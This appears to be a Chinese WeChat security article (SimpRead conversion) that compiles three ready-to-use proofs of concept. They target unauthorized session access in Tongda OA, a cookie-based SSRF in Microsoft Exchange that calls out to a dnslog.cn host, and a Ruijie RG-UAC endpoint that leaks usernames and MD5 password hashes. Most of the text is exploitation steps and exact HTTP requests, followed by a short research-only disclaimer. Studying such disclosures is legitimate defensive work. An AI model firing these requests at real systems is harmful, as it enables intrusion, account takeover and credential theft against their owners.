本文由 简悦 SimpRead 转码, 原文地址 mp.weixin.qq.com
1
通达 OA 未授权访问
漏洞类型:
未授权访问
漏洞利用条件:
用户在线
漏洞详情
1、先访问
http://xxx.xxx.xxx/mobile/auth_mobi.php?isAvatar=1&uid=1&P_VER=0
如果出现空白页面, 则说明已经获得权限.
2、在访问 http://xxx.xxx.xxx/general/ , 成功进入系统
3、如果出现 RELOGIN, 则说明目前没有人在线, 需要等待有人登录的时候在尝试
漏洞 POC:
GET http://xxx.xxx.xxx/mobile/auth_mobi.php?isAvatar=1&uid=1&P_VER=0
GET http://xxx.xxx.xxx/general/
2
Exchange SSRF
漏洞类型:
SSRF
漏洞利用条件:
无
漏洞详情
1、寻找目标
2、在 cookie 中插入 dnslog payload
3、DNSLOG 刷新, 证明 SSRF 存在
漏洞 POC:
GET /owa/auth/x.js HTTP/1.1
Cookie:
X-AnonResource=true; X-AnonResource-Backend=woizqq.dnslog.cn/ecp/default.flt?~3; X-BEResource=woizqq.dnslog.cn/owa/auth/logon.aspx?~3;
3
锐捷 RG-UAC 信息泄漏
漏洞类型:
未授权访问, 敏感信息泄露
漏洞利用条件:
无
漏洞详情
1、直接访问锐捷 - UAC 的如下链接即可获得用户名和 MD5 加密密码
https://xxx.xxx.xxx/get_dkey.php
漏洞 POC:
GET https://xxx.xxx.xxx/get_dkey.php
END
注:此文章只用于漏洞研究,切勿用于违法用途。因滥用产生的一切后果与本公众号无关。
参考文章:
https://mp.weixin.qq.com/s/LJRI04VViL4hbt6dbmGHAw
https://paper.seebug.org/1492/
https://twitter.com/zhzyker/status/1368572200194740232/photo/1
扫码关注更多精彩